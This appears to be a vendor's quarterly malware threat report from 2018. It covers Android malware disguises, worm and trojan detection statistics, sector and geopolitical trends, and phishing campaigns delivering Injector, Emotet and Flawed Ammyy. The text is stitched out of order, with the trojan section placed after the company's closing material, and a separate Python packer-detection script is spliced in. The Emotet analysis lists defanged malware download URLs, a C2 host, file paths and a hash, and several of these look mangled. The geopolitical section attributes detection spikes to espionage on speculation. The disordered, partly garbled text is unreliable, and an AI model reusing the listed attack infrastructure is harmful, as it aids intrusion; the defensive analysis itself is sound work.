Disguises of RedAlert: Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber; Version 2: Update Google Market, Flash Player, Tactic, FlashLight

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

de.postbank.finanzassistent

pl.mbank

aib.ibank.android

The second version can block access to some websites, including Google Chrome, the Google Play store, Gmail and YouTube.

4.1.9 Hero Rat. The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.

Disguises of Hero Rat (version 1): CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس, تلگرام ھمھ کاره, Proxy, دوست یاب, Telegram Ton, شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان

Its code is available on a Telegram hacking channel. Noticeably, it is sold in three options: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity: it steals text messages and audio recordings, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay. The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Disguises of Sonvpay (version 1): Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone

Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip" option. If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises listed above.

4.1.11 CoinHive. And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them upgrading its mining potential. It is disseminated via the counterfeit apps you see below, but one of the vectors is especially interesting.

Disguises of CoinHive: Version 1: Netflix Hack, Instagram Hack; Version 2: TSF Launcher; Version 3: Android Service, PlacarTv Futebol Ao Vivo

The malware is covertly propagated via... another cryptominer named CoinMiner.

How is it possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim. Thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.


4.2 Android Malware Catalogued by Month. Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April

4.2.2 May 2018

Android-targeted malware in May


4.2.3 June 2018

Android-targeted malware in June


5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms. A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources, and possibly cause a denial of service. For this Q2 2018 report we place worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic Worms. This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.


5.1.2 Net Worms. A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms. Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.


5.1.4 p2p Worms. A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.


5.1.5 IM Worms. Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.


5.2.1 Backdoors. A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses. A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans. Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the number one country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.


5.2.4 Exploits. Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (.pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.


5.3 Medium Threat Malware. In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.


5.3.1 Constructor. Constructors are applications that can be used to automatically create malware files.

For Q2 Alamar was the number one constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2 Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers. Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
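As an added example (not code from the Comodo report), the following Python script performs the triage a defender applies to a suspected packed binary: it parses the PE section table and flags both the stock UPX section names and any section whose bytes are nearly incompressible, which is the signal that survives when a modified UPX build renames its sections. The PE images it inspects are constructed inline for the demo, and the 7.0-bit entropy threshold is an assumed rule of thumb, not a value from the report.

```python
"""Packed-executable triage: section names plus per-section entropy.

Added example, not Comodo's code. It walks the PE section table with the
standard library only and reports the two signals a UPX-style packer leaves
behind: the stock UPX section names and a section whose bytes are nearly
incompressible (high Shannon entropy). A modified UPX build (the "MUPX" of the
report) commonly renames its sections, so the entropy check is the one that
still fires. The PE images at the bottom are constructed here for the demo.
"""
import hashlib
import math
import struct

UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2", "UPX!"}
HIGH_ENTROPY = 7.0        # bits per byte; compressed or encrypted data sits near 8.0
MIN_SECTION_BYTES = 256   # tiny sections give unreliable entropy figures


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or constant data, at most 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(image: bytes):
    """Yield (name, raw_bytes) for each section header in a PE image."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4                        # COFF file header (20 bytes)
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    sec = coff + 20 + opt_size                 # first 40-byte section header
    for _ in range(num_sections):
        name = image[sec:sec + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, sec + 16)
        yield name, image[raw_ptr:raw_ptr + raw_size]
        sec += 40


def packer_indicators(image: bytes) -> dict:
    """Return the UPX-named sections, the high-entropy sections and a verdict."""
    upx_named, high_entropy = [], []
    for name, raw in pe_sections(image):
        if name in UPX_SECTION_NAMES:
            upx_named.append(name)
        if len(raw) >= MIN_SECTION_BYTES:
            ent = shannon_entropy(raw)
            if ent >= HIGH_ENTROPY:
                high_entropy.append((name, round(ent, 2)))
    return {
        "upx_sections": upx_named,
        "high_entropy_sections": high_entropy,
        "likely_packed": bool(upx_named or high_entropy),
    }


# --- constructed demo inputs (minimal, non-loadable PE images) ----------------

def build_sample_pe(sections) -> bytes:
    """Assemble MZ/PE headers and a section table around the given (name, data)."""
    opt_size = 16                              # placeholder optional header
    hdr_len = 64 + 4 + 20 + opt_size + 40 * len(sections)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)          # e_lfanew at 0x3C
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    table, body, ptr = b"", b"", hdr_len
    for name, data in sections:
        # name[8], VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
        # reloc/linenumber fields (unused here), Characteristics
        table += name.encode().ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", len(data), 0x1000, len(data), ptr, 0, 0, 0, 0, 0x60000020)
        body += data
        ptr += len(data)
    return dos + b"PE\0\0" + coff + b"\0" * opt_size + table + body


def pseudo_random_bytes(n: int, seed: bytes = b"demo") -> bytes:
    """Deterministic stand-in for compressed data: a SHA-256 hash chain."""
    out, block = b"", seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


SAMPLE_UPX = build_sample_pe([("UPX0", b"\0" * 512),
                              ("UPX1", pseudo_random_bytes(4096))])
SAMPLE_RENAMED = build_sample_pe([(".text", b"\0" * 512),
                                  (".rsrc", pseudo_random_bytes(4096))])
SAMPLE_PLAIN = build_sample_pe([(".text", b"mov eax, 1\nret\n" * 64),
                                (".data", b"Hello, world!\0" * 40)])

if __name__ == "__main__":
    for label, img in (("stock UPX", SAMPLE_UPX), ("renamed sections", SAMPLE_RENAMED),
                       ("unpacked", SAMPLE_PLAIN)):
        print(label, packer_indicators(img))
```

The renamed-sections sample is the MUPX case: no UPX names remain, yet the near-8.0-bit ".rsrc" section still gives the packing away.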

In Q2 2018 Russia was the number one home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.


5.3.3 Email Flooder. Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools. Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes. "Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.


5.4 Low Threat Malware: Applications. In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications. Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications. The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications. Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite, and include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical Analysis. In this section let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik: the New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA. This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. After which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.


7.2 China. This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several significant new trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies, and postures.


North America: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531, +1 (888) 266 6361; Int: +1 (703) 581 6361; Fax: +1 (973) 777 4394; sales@comodo.com

Europe: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

Asia: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800; www.comodo.co.in

About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters, and analyzes malware, ransomware, viruses, and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia, and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists, and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam, or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government, and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates, and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network, and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine, and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group, Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


TrojWare.Win32.Injector uses process injection as its main technique for carrying out malicious actions. It is mostly used to bypass security products.

TrojWare.JS.Downloader consists of scripts that download and execute malware from the Internet. It is usually spread via phishing email.

Such diversity of malicious activity and their special ability to hide have always made trojans one of the hardest kinds of malware to fight. But in Q2 2018 they became even more sophisticated and dangerous. Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community.

First among the trends is an explosive mixture of trojans and phishing emails. Earlier, phishing emails mostly contained a link to a malicious website to lure victims into supplying their credentials. But today phishing emails have become a potent means of delivery for trojans and other malware. These trojans steal credentials and private information by ferreting through infected machines in search of valuable data and then sending it to cybercriminals' servers.

The accompanying graph shows the most popular malware spread via email. Note that 18 of 20 are trojans.

Distribution of Phishing Families of Malware


2.1 The Most Widespread Trojan

The most proliferated trojan, TrojWare.Win32.Injector, is designed to steal credentials from infected computers. It was spread via a fake email imitating a message from a shipping and trading company. As seen in the screenshot, the attached malware is carefully disguised with a plausible name and icon to look like a real scanned document.

If a user takes the bait and runs the file, it copies itself to %APPDATA% as D5E2DEE36C7A.exe, then launches itself from that location and starts to gather credentials present in the system.

It collects credentials and private data from known browsers, email clients, FTP clients, and WebDAV and SCP clients. Then it sends all the collected data to the attackers' server, httpcallbedmlpackfarefrephp.

The phishing email


2.2 PowerShell-based attack with Emotet

Another alarming trend relates to the malware itself rather than its delivery method. Often cybercriminals use malware based not on native Windows .exe files but instead utilize PowerShell scripts and other legitimate software to infect a computer. This type of attack is much harder to detect with antivirus tools.

Emotet is one of the most aggressive trojans currently active in cyberspace. Spread by various infection vectors and backed by a huge network of compromised hosts, it heavily affects many individuals and companies.

The following attack started with an email that imitated a message from the IRS about a "Tax Account Transcript". Notice the message is written in a cheerful manner to inspire user trust.

The phishing email


The attached file is an Office document containing a VBScript. As the default settings of a newly installed Microsoft Office do not allow execution of such scripts, the attackers added a special option to convince the victims to turn on VBScript execution.

The special option to convince the victims to turn on VBScript execution


The purpose of the VBScript is to launch PowerShell.


The malware downloads itself to a temporary folder and executes binaries located at: hxxpwwwiyilikleralemicomGtXvlc, hxxpwwwthecyberconxioncomPUqUUe, hxxpEliasWesselcomvu6xGmS, hxxpmossbeachmusicdeXuBBN6r, hxxpairmaxxrswIdY.

At the time of writing, only the thecyberconxion.com host was serving a malware binary (SHA1: 5974190561e707f63d776e55336841bd871eebdb).

The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service, "lanesviewer", to ensure persistence.

The malware creates the "lanesviewer" service to ensure persistence


And after that, Emotet begins its real mission: stealing private data from the compromised system, which it then sends to the cybercriminals' Command & Control server.

The next example is even more cunning because it infects computers using popular, legitimate Microsoft software.

2.3 Flawed Ammyy RAT attack based on legitimate software

The Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks. What is most impressive is that it is based on legitimate software called Ammyy Admin. Its history is a striking example of how malicious hackers turn legitimate tools into a thief's tool.

Ammyy Admin is remote desktop software created by the Ammyy Group company. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.

The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators tried to adopt it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin software with a bundle containing malware. Thus every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle continued endlessly.


As you can see in the diagram, Ammyy Admin was used in spreading many types of nefarious malware.

The newest malicious modification of Ammyy Admin is called Flawed Ammyy. It is a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of the third Ammyy Admin version. Flawed Ammyy RAT lets attackers use functions such as remote desktop control, a file system manager, proxy support, and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, etc.

The way Flawed Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users. What is especially worth noticing is that this trick is also based on using legitimate software, from Microsoft this time.


Flawed Ammyy is delivered to victims through phishing emails with an IQY file attachment, as in the following screenshot.

The phishing email

IQY files are intended for making an Internet query from MS Excel, so an IQY file contains a URL and other related parameters. It can download files and run them directly in MS Excel.

The infected IQY file included a malicious URL, so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.

